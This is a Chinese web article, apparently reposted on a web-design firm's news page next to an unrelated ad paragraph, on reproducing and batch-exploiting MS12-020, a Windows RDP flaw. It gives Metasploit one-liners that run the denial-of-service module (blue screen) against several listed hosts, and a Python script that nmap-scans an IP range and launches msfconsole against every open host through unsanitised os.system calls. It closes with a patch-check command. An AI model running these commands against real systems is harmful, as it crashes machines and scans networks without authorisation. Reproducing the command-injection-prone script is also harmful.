新聞中心
這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷(xiāo)解決方案
MS12-020漏洞復(fù)現(xiàn)及自動(dòng)化批量利用
漏洞描述
Windows 遠(yuǎn)程桌面協(xié)議漏洞,可執(zhí)行代碼,POC可導(dǎo)致藍(lán)屏。(RDP遠(yuǎn)程桌面執(zhí)行代碼漏洞)
影響目標(biāo)
Windows XP sp3
Windows xp sp2
Windows Vista sp2
Windows 7
Windows Server 2003
Windows Server 2008
Windows Server 2008 R2
msfpayload利用
msfconsole
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhost
run
此pyload僅支持單目標(biāo)。
創(chuàng)新互聯(lián)-專(zhuān)業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性?xún)r(jià)比應(yīng)縣網(wǎng)站開(kāi)發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫(kù),直接使用。一站式應(yīng)縣網(wǎng)站制作公司更省心,省錢(qián),快速模板網(wǎng)站建設(shè)找我們,業(yè)務(wù)覆蓋應(yīng)縣地區(qū)。費(fèi)用合理售后完善,十載實(shí)體公司更值得信賴(lài)。
通過(guò)msfconsole快速啟動(dòng)
msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10;run;set rhost 10.129.10.37;run;set rhost 10.129.10.169;run;set rhost 10.129.10.209;run;set rhost 10.129.10.232;run;"
通過(guò)bash腳本批量生成檢測(cè)腳本(nmap-port2ip.py)
#encoding:utf-8
import xml.sax
import sys
import os
class MovieHandler( xml.sax.ContentHandler ):
def __init__(self, filterport=None):
self.CurrentData = ""
self.port=filterport
self.data = ""
self.datas=[]
# 元素開(kāi)始事件處理
def startElement(self, tag, attributes):
self.CurrentData = tag
if tag == "address":
self.data=attributes["addr"]
# 元素結(jié)束事件處理
def endElement(self, tag):
if self.CurrentData == "address":
self.datas.append(self.data)
self.data=""
self.CurrentData = ""
class Gather(object):
def __init__(self, filterport=None):
# 創(chuàng)建一個(gè) XMLReader
self.parser = xml.sax.make_parser()
# turn off namepsaces
self.parser.setFeature(xml.sax.handler.feature_namespaces, 0)
# 重寫(xiě) ContextHandler
self.Handler = MovieHandler(filterport)
self.parser.setContentHandler( self.Handler )
def run(self, port):
self.Handler.datas=[]
self.parser.parse(port+".xml")
print(self.Handler.datas)
def get_ans(self):
return self.Handler.datas
if __name__ == "__main__":
if len(sys.argv) !=3:
os.exit()
os.system("nmap "+sys.argv[1]+" -p "+sys.argv[2]+" --open -oX "+sys.argv[2]+".xml")
g = Gather()
g.run(sys.argv[2])
# create cmd
cmd = '"use auxiliary/scanner/rdp/ms12_020_check;set threads 20;'
ips = g.get_ans()
if len(ips)>0:
for ip in g.get_ans():
cmd += "set rhosts "+ip+";run;"
cmd += 'exit;"'
os.system("msfconsole -x " + cmd)
# 使用方法
python nmap-port2ip.py
# 功能:針對(duì)某種服務(wù)的漏洞對(duì)指定IP段的所有主機(jī)進(jìn)行檢測(cè),獲取可能存在問(wèn)題的主機(jī)IP,并調(diào)用對(duì)應(yīng)的Msf Payload進(jìn)行利用嘗試。
# ip可支持單一IP、CIDR形式IP、10.129.1.1-154等幾種,格式與nmap一致
# port僅支持單端口
漏洞補(bǔ)丁檢測(cè)
systeminfo | find /i "KB2621440"
如果存在結(jié)果如下,證明已打補(bǔ)丁,否則,需要打?qū)?yīng)的補(bǔ)丁。
Windows Server 2003補(bǔ)丁
參考文章
- 微軟MS12-020
本文標(biāo)題:MS12-020漏洞復(fù)現(xiàn)及自動(dòng)化批量利用
網(wǎng)頁(yè)網(wǎng)址:http://www.dlmjj.cn/article/pephds.html